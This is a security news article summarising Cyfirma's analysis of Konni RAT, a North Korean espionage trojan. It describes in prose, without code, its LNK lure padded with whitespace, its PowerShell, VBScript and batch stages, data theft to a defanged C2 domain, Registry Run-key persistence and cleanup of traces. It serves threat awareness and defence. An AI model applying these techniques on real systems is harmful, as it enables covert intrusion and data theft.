Konni RAT Resurfaces: North Korean Espionage Malware Evolves with Stealth and Persistence

Cyfirma’s recent analysis sheds light on Konni RAT, a sophisticated Remote Access Trojan (RAT) targeting Windows systems. This malware employs a multi-stage attack, utilizing a combination of batch files, PowerShell scripts, and VBScript to infiltrate systems, exfiltrate data, and maintain persistence.

“Konni RAT employs a multi-stage attack process involving a combination of batch files, PowerShell scripts, and VBScript to exfiltrate sensitive data, maintain persistence, and execute additional payloads,” the report states.

The infection chain begins with a ZIP archive containing decoy PDF files and a malicious .lnk file disguised as a .docx document. The LNK file exploits Windows Explorer’s quirks—such as file extension hiding and the 260-character path limit—to bury a command that launches cmd.exe and triggers a cascade of hidden execution steps.

“The file appears as a benign shortcut with 25 visible characters, followed by 235 whitespace characters… effectively hiding the actual command.”

This command initiates a PowerShell script that searches for .lnk files, decodes encrypted segments, and prepares the malware payload, including a malicious CAB file (disappear.cab) and a decoy document to distract the user.

Konni RAT’s architecture reflects a layered and modular design:

• PowerShell executes functions like friend, wickedness, and pregnant—names intentionally chosen to obfuscate behavior.
• A VBScript (start.vbs) is launched to maintain stealth, leveraging Windows Shell COM objects for indirect command execution.
• That script triggers a batch file (9315288.bat) that loops through other scripts, gathers system data, and even handles exfiltration.

“Its use of loops and conditionals reflects a design aimed at evading detection, achieving persistence, and adapting to the system’s state.”

The script collects:

• Directory listings from Downloads, Documents, and Desktop
• System details via systeminfo
• All data is saved into files like d1.txt, d2.txt, and d4.txt

These files are then uploaded to a C2 server (roofcolor[.]com) via encoded HTTP POST requests. Custom PowerShell functions encrypt the data, attach system identifiers like %COMPUTERNAME%, and erase all traces post-upload.

Konni RAT ensures long-term access by:

• Adding the VBScript to the Windows Registry Run key
• Deleting all temporary files, including .lnk, .cab, and intermediary .bat scripts
• Using silent execution (> nul) to suppress command window outputs

“This strategy conceals the presence of the LNK file and creates the illusion for the victim that the .docx file is the same as the one initially extracted.”

Even failed payloads are accounted for—if something doesn’t download correctly, the malware simply skips that step, deletes evidence, and proceeds with minimal impact.

Cyfirma confirms the tool’s ties to APT37, a North Korean state-sponsored group linked to espionage campaigns across Russia, East Asia, Europe, and the Middle East.

“Konni RAT… has been used in campaigns targeting political organizations and entities across Russia, East Asia, Europe, and the Middle East.”

The malware has been spotted in attacks against the Russian Ministry of Foreign Affairs, embedded within backdoored software and malicious macro-laced documents.

Konni RAT is designed to efficiently exfiltrate sensitive data, including system information and user files, to a remote server. Its modular design and advanced evasion strategies pose significant risks to system security, effectively bypassing detection and hindering analysis.

Related Posts:

• Cyberattackers Target South Korean Inboxes with LNK Weaponry
• Excel File Unleashes Sophisticated Cobalt Strike Cyberattack
• LNK Files and SSH Commands: The New Arsenal of Advanced Cyber Attacks
• AsyncRAT Malware Campaign Exploits Bitbucket to Deliver Multi-Stage Attack
• Hidden Threat: Zero-Day Windows Shortcut Exploited by Global APT Networks